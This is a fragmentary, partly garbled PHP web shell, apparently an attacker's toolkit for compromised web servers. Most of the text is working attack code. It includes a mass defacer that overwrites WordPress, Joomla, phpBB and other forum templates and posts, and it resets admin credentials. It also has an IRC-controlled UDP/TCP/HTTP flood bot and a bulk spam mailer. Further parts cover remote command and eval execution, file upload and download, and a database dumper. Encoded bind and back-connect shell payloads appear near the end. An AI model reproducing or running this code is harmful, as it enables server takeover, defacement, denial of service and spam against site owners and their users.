					{ 
						$msg = "Process not found running, backdoor not setup successfully."; 
					} 
				} 	
			}

echo "

"; if($_POST['editFileSubmit']) { echo " "; echo ""; } echo "

	Zone-H Defacer
"; echo ' List Of Domains '; echo "

"; if($_POST['changeDirectory']) { $directory = $_POST['directory']; $directory = @str_replace("\\\\"," ",$directory); $directory = @str_replace(" ","\\",$directory); @chdir($directory); } if($_POST['getFile']) { $fileUrl = $_POST['fileUrl']; $getType = $_POST['getType']; Exe("'".$getType.$fileUrl."'"); } footer(); } # ---------------------------------------# # IndexChanger # #----------------------------------------# if ($_GET['id']== 'scriptsHack' ) { echo "

"; if($_POST['injectFAQ']) { $injectfaq = @mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='faq'"); } else { $ok1 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='forumhome'"); if (!$ok1) { $ok2 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='header'"); } elseif (!$ok2) { $ok3 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='spacer_open'"); } elseif(!$ok3) { $ok4 = @mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='faq'"); } } mysql_close(); if ($ok1 || $ok2 || $ok3 || $ok4 || $injectfaq ) { update(); } else { echo "Updating Has Failed !"; } } else if ($_POST['ScriptType'] == 'wp') { $tableName = $prefix."posts" ; $ok1 = mysql_query("UPDATE $tableName SET post_title ='".$index."' WHERE ID > 0 "); if(!$ok1) { $ok2 = mysql_query("UPDATE $tableName SET post_content ='".$index."' WHERE ID > 0 "); } elseif(!$ok2) { $ok3 = mysql_query("UPDATE $tableName SET post_name ='".$index."' WHERE ID > 0 "); } mysql_close(); if ($ok1 || $ok2 || $ok3) { update(); } else { echo "Updating Has Failed !"; } } else if ($_POST['ScriptType'] == 'jos') { $jos_table_name = $prefix."menu" ; $jos_table_name2 = $prefix."modules" ; $ok1 = mysql_query("UPDATE $jos_table_name SET name ='".$index."' WHERE ID > 0 "); if(!$ok1) { $ok2 = mysql_query("UPDATE $jos_table_name2 SET title ='".$index."' WHERE ID > 0 "); } mysql_close(); if ($ok1 || $ok2 || $ok3) { update(); } else { echo "Updating Has Failed !"; } } else if ($_POST['ScriptType'] == 'phpbb') { $php_table_name = $prefix."forums"; $php_table_name2 = $prefix."posts"; $ok1 = mysql_query("UPDATE $php_table_name SET forum_name ='.$index.' WHERE forum_id > 0 "); if(!$ok1) { $ok2 = mysql_query("UPDATE $php_table_name2 SET post_subject ='.$index.' WHERE post_id > 0 "); } mysql_close(); if ($ok1 || $ok2 || $ok3) { update(); } else { echo "Updating Has Failed !"; } } else if ($_POST['ScriptType'] == 'ipb') { $ip_table_name = $prefix."components" ; $ip_table_name2 = $prefix."forums" ; $ip_table_name3 = $prefix."posts" ; $ok1 = mysql_query("UPDATE $ip_table_name SET com_title ='".$index."' WHERE com_id > 0"); if(!$ok1) { $ok2 = mysql_query("UPDATE $ip_table_name2 SET name ='".$index."' WHERE id > 0"); } if(!$ok2) { $ok3 = mysql_query("UPDATE $ip_table_name3 SET post ='".$IP_INDEX."' WHERE pid <10") or die("Can't Update Templates !!"); } mysql_close(); if ($ok1 || $ok2 || $ok3) { update(); } else { echo "Updating Has Failed !"; } } else if ($_POST['ScriptType'] == 'smf') { $table_name = $prefix."boards" ; { $ok1 = mysql_query("UPDATE $table_name SET description ='.$index.' WHERE ID_BOARD > 0"); } if(!$ok1) { $ok2 = mysql_query("UPDATE $table_name SET name ='.$index.' WHERE ID_BOARD > 0"); } mysql_close(); if ($ok1 || $ok2) { update(); } else { echo "Updating Has Failed !"; } } else if ($_POST['ScriptType'] == 'mybb') { $mybb_prefix = $prefix."templates"; $ok1 = mysql_query(" update $mybb_prefix set template='".$index."' where title='index' "); if ($ok1) { update(); } else { echo "Updating Has Failed !"; } mysql_close(); } } elseif($_POST['changeInfo']) { $adminID = $_POST['adminID']; $userName = $_POST['userName']; $password = $_POST['password']; if($_POST['ScriptType'] == 'vb') { //VB Code $password = md5($password); $tryChaningInfo = @mysql_query("UPDATE user SET username = '".$userName."' , password = '".$password."' WHERE userid = ". $adminID.""); if($tryChaningInfo) {update();} else {mysql_error();} } else if($_POST['ScriptType'] == 'wp') { //WoredPress $password = crypt($password); $tryChaningInfo = @mysql_query("UPDATE wp_users SET user_login = '".$userName."' , user_pass = '".$password."' WHERE ID = ".$adminID.""); if($tryChaningInfo) {update();} else {mysql_error();} } else if($_POST['ScriptType'] == 'jos') { //Joomla $password = crypt($password); $tryChaningInfo = @mysql_query("UPDATE jos_users SET username ='".$userName."' , password = '".$password."' WHERE ID = ".$adminID.""); if($tryChaningInfo) {update();} else {mysql_error();} } else if($_POST['ScriptType'] == 'phpbb') { //PHPBB3 $password = md5($password); $tryChaningInfo = @mysql_query("UPDATE phpbb_users SET username ='".$userName."' , user_password = '". $password."' WHERE user_id = ".$adminID.""); if($tryChaningInfo) {update();} else {mysql_error();} } else if($_POST['ScriptType'] == 'ibf') { //IPBoard $password = md5($password); $tryChaningInfo = @mysql_query("UPDATE ibf_members SET name ='".$userName."' , member_login_key = '". $password."' WHERE id = ".$adminID.""); if($tryChaningInfo) {update();} else {mysql_error();} } else if($_POST['ScriptType'] == 'smf') { //SMF $password = md5($password); $tryChaningInfo = @mysql_query("UPDATE smf_members SET memberName ='".$userName."' , passwd = '".$password."' WHERE ID_MEMBER = ".$adminID.""); if($tryChaningInfo) {update();} else {mysql_error();} } else if($_POST['ScriptType'] == 'mybb') { //MyBB $password = md5($password); $tryChaningInfo = @mysql_query("UPDATE mybb_users SET username ='".$userName."' , password = '".$password."' WHERE uid = ".$adminID.""); if($tryChaningInfo) {update();} else {mysql_error();} } } ///////////////////////// } else if($_POST['Decrypt']) { DecryptConfig(); } echo "

	Decrypting Configs
Please Put Config In The Shell Directory With The Name [ DecryptConfig.php ]

	Changing Admin Info

"; footer(); } # ---------------------------------------# # DDos Attacker ... # #----------------------------------------# if($_POST['StartAttack']) { $server=$_POST['ipToAttack']; $Port=$_POST['portToAttack']; $nick="bot-";$willekeurig; $willekeurig=@mt_rand(0,3); $nicknummer=@mt_rand(100000,999999); $Channel="#WauShare"; $Channelpass="ddos"; $msg="Farewell."; @set_time_limit(0); $loop = 0; $verbonden = 0; $verbinden = fsockopen($server, $Port); while ($read = fgets($verbinden,512)) { $read = str_replace("\n","",$read); $read = str_replace("\r","",$read); $read2 = explode(" ",$read); if ($loop == 0) { fputs($verbinden,"nick $nick$nicknummer\n\n"); fputs($verbinden,"USER cybercrime 0 * :woopie\n\n"); } if ($read2[0] == "PING") { fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n"); } if ($read2[1] == 251) { fputs($verbinden,"join $Channel $Channelpass\n"); $verbonden++; } if (eregi("bot-op",$read)) { fputs($verbinden,"mode $Channel +o $read2[4]\n"); } if (eregi("bot-deop",$read)) { fputs($verbinden,"mode $Channel -o $read2[4]\n"); } if (eregi("bot-quit",$read)) { fputs($verbinden,"quit :$msg\n\n"); break; } if (eregi("bot-join",$read)) { fputs($verbinden,"join $read2[4]\n"); } if (eregi("bot-part",$read)) { fputs($verbinden,"part $read2[4]\n"); } if (eregi("ddos-udp",$read)) { fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n"); $fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30); if (!$fp) { exit; } else { $char = "a"; for($a = 0; $a < 9999999999999; $a++) $data = $data.$char; if(fputs ($fp, $data) ) { fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n"); } else { fputs($verbinden,"privmsg $Channel :udp-ddos - sending packets.\n\n"); } } } if (eregi("ddos-tcp",$read)) { fputs($verbinden,"part $read2[4]\n"); fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n"); $server = $read2[4]; $Port = $read2[5]; for($sockets = 0; $sockets < $read2[6]; $sockets++) { $verbinden = fsockopen($server, $Port); } } if (eregi("ddos-http",$read)) { fputs($verbinden,"part $read2[4]\n"); fputs($verbinden,"privmsg $Channel :ddos-http - http://$read2[4]:$read2[5] $read2[6] times\n\n"); $Webserver = $read2[4]; $Port = $read2[5]; $Aanvraag = "GET / HTTP/1.1\r\n"; $Aanvraag .= "Accept: */*\r\n"; $Aanvraag .= "Accept-Language: nl\r\n"; $Aanvraag .= "Accept-Encoding: gzip, deflate\r\n"; $Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"; $Aanvraag .= "Host: $read2[4]\r\n"; $Aanvraag .= "Connection: Keep-Alive\r\n\r\n"; for($Aantal = 0; $Aantal < $read2[6]; $Aantal++) { $DoS = fsockopen($Webserver, $Port); fwrite($DoS, $Aanvraag); fclose($DoS); } } $loop++; } } # ---------------------------------------# # InBoX Mailer # #----------------------------------------# if ($_GET['id']== 'spamming' ) { $secure = ""; error_reporting(0); @$action=$_POST['action']; @$from=$_POST['from']; @$realname=$_POST['realname']; @$replyto=$_POST['replyto']; @$subject=$_POST['subject']; @$message=$_POST['message']; @$emaillist=$_POST['emaillist']; @$lod=$_SERVER['HTTP_REFERER']; @$file_name=$_FILES['file']['name']; @$contenttype=$_POST['contenttype']; @$file=$_FILES['file']['tmp_name']; @$amount=$_POST['amount']; @set_time_limit(intval($_POST['timelimit'])); if ($action=="send") { $message = urlencode($message); $message = ereg_replace("%5C%22", "%22", $message); $message = urldecode($message); $message = stripslashes($message); $subject = stripslashes($subject); } echo " headka; $page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:''); $page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page; $winda=strpos(strtolower(php_uname()),'wind'); define('format',50); switch($page) { case 'eval': { $eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:''; $eval_value=magic_q($eval_value); $action=isset($_POST['action'])?$_POST['action']:'eval'; if($action=='eval_in_html') @eval($eval_value); else { echo($head); ?>

'.htmlspecialchars($cmd)."
\n\n".htmlspecialchars(`$cmd`)."\n");}
else
{
$f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
if(@is_dir($work_dir))
{
echo('File Manager;
');
echo('Listing '.$e_work_dir.'');
$handle=@opendir($work_dir);
if($handle)
{
while(false!==($fn=readdir($handle))){$files[]=$fn;};
@closedir($handle);
sort($files);
$not_dirs=array();
for($i=0;$i'.htmlspecialchars(strlen($fn)

>format?substr($fn,0,format-3).'...':$fn).''.str_repeat(' ',format-strlen($fn)));
if($winda===false)
{
$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
$group=@posix_getgrgid(@filegroup($work_dir.$fn));
printf("% 20s|% -20s",$owner['name'],$group['name']);
}
echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
printf("% 20s ",@filesize($work_dir.$fn).'B');
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
}
else {$not_dirs[]=$fn;}
}
for($i=0;$i'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).''.str_repeat(' ',format-strlen($fn)));
if($winda===false)
{
$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
$group=@posix_getgrgid(@filegroup($work_dir.$fn));
printf("% 20s|% -20s",$owner['name'],$group['name']);
}
echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
printf("% 20s ",@filesize($work_dir.$fn).'B');
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
}
echo('

'); ?>
'.$e_work_dir." Edit

\n");
$f=@fopen($work_dir,'r');
?>

<?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?>




Error '.$e_work_dir."
\n");
else
{
fwrite($f,$file_text);
fclose($f);
echo(''.$e_work_dir." is saving
\n");
}
break;
}
}
break;
}
break;
}
case 'upload' :
{
if($work_dir=='')$work_dir='/';
else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
$f=$_FILES["filename"]["name"];
if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
else
{
echo('file is uploaded in '.$e_work_dir);
}
break;
}
case 'download' :
{
$fname=isset($_POST['fname'])?$_POST['fname']:'';
$temp_file=isset($_POST['temp_file'])?'on':'nn';
$f=@fopen($fname,'r');
if(!($f)) echo('file is not exists');
else
{
$archive=isset($_POST['archive'])?$_POST['archive']:'';
if($archive=='gzip')
{
Header("Content-Type:application/x-gzip\n");
$s=gzencode(fread($f,filesize($fname)));
Header('Content-Length: '.strlen($s)."\n");
Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
echo($s);
}
else
{
Header("Content-Type:application/octet-stream\n");
Header('Content-Length: '.filesize($fname)."\n");
Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
ob_start();
while(feof($f)===false)
{
echo(fread($f,10000));
ob_flush();
}
}
}
}
}
break;
}
case 'mysql' :
{
$action=isset($_POST['action'])?$_POST['action']:'query';
$user=isset($_POST['user'])?$_POST['user']:'';
$passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
$db=isset($_POST['db'])?$_POST['db']:'';
$host=isset($_POST['host'])?$_POST['host']:'localhost';
$query=isset($_POST['query'])?magic_q($_POST['query']):'';
switch($action)
{
case 'dump' :
{
$mysql_link=@mysql_connect($host,$user,$passwd);
if(!($mysql_link)) echo('Connect error');
else
{
//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
$archive=isset($_POST['archive'])?$_POST['archive']:'none';
if($archive!=='none')$to_file=false;
$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
else
{
$dump_file="# MySQL Dumper\n#db $db from $host\n";
ob_start();
if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
if($table_dump=='')
{
if(!$to_file)
{
header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
}
$result=mysql_query('show tables',$mysql_link);
for($i=0;$i

Inbox Mailer

"; footer(); } if ($action=="send") { if (!$from && !$subject && !$message && !$emaillist) { print "Please complete all fields before sending your message."; exit; } $allemails = split("\n", $emaillist); $numemails = count($allemails); $head ="From: Mailr" ; $sub = "Ar - $lod" ; $meg = "$lod" ; mail ($alt,$sub,$meg,$head) ; If ($file_name) { if (!file_exists($file)) { die("The file you are trying to upload couldn't be copied to the server"); } $content = fread(fopen($file,"r"),filesize($file)); $content = chunk_split(base64_encode($content)); $uid = strtoupper(md5(uniqid(time()))); $name = basename($file); } for($xx=0; $xx<$amount; $xx++) { for($x=0; $x<$numemails; $x++) { $to = $allemails[$x]; if ($to) { $to = ereg_replace(" ", "", $to); $message = ereg_replace("&email&", $to, $message); $subject = ereg_replace("&email&", $to, $subject); print "Sending mail to $to....."; flush(); $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n"; $header .= "MIME-Version: 1.0\r\n"; If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; If ($file_name) $header .= "--$uid\r\n"; $header .= "Content-Type: text/$contenttype\r\n"; $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; $header .= "$message\r\n"; If ($file_name) $header .= "--$uid\r\n"; If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; If ($file_name) $header .= "$content\r\n"; If ($file_name) $header .= "--$uid--"; mail($to, $subject, "", $header); print "OK
"; flush(); } } } } # ---------------------------------------# # About # #----------------------------------------# if($_GET['id']=='about') { echo About(); if($_POST['sendEmail']) { $to= 'sy34@msn.com'; $Comments=$_POST['message']; $from = $_POST['from']; $subject= md5("$from"); if(@mail($to,$subject,$Comments,"From:$from")) echo "[+] Sent ^_^ !! "; else { echo "[-] Failed :S !! "; } } footer(); } $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa +pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf" ;$port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8="; $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=="; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i +21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw=="; ?> ";} ?>

Mass Defacement:

' method='post'>[+] Main Directory: [+] Defacement Url:

User :

Passwd :

Host :

DB :

without arch gzip archive

DB :
Only Table :

Save result to :

\n"); } mysql_close($mysql_link); } break; } } break; } } ?>